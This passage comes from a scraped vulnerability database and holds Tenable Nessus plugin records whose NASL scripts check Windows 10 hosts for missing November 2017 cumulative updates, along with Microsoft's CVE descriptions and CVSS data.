The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104550);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11803\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11844\",\n \"CVE-2017-11845\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11861\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11870\",\n \"CVE-2017-11871\",\n \"CVE-2017-11872\",\n \"CVE-2017-11873\",\n \"CVE-2017-11874\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101704,\n 101705,\n 101706,\n 101707,\n 101708,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101723,\n 101725,\n 101727,\n 101728,\n 101729,\n 101730,\n 101731,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101749,\n 101750,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048954\");\n script_xref(name:\"MSFT\", value:\"MS17-4048954\");\n\n script_name(english:\"KB4048954: Windows 10 Version 1703 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 
host is missing security update 4048954.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11870,\n CVE-2017-11871, CVE-2017-11873)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-11803, CVE-2017-11844)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. 
(CVE-2017-11863)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. 
The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11845)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\");\n # https://support.microsoft.com/en-us/help/4048954/windows-10-update-kb4048954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2be2679f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048954.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048954');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048954])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:46", "description": "The remote Windows host is missing security update 4048956.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. 
An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048956: Windows 10 LTSB November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048956.NASL", "href": "https://www.tenable.com/plugins/nessus/104552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104552);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101727,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048956\");\n script_xref(name:\"MSFT\", value:\"MS17-4048956\");\n\n script_name(english:\"KB4048956: Windows 10 LTSB November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048956.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. 
Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048956/windows-10-update-kb4048956\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60fecb50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048956.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048956');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048956])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:57", "description": "The remote Windows host is missing security update 4048953.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. 
The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11873)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service 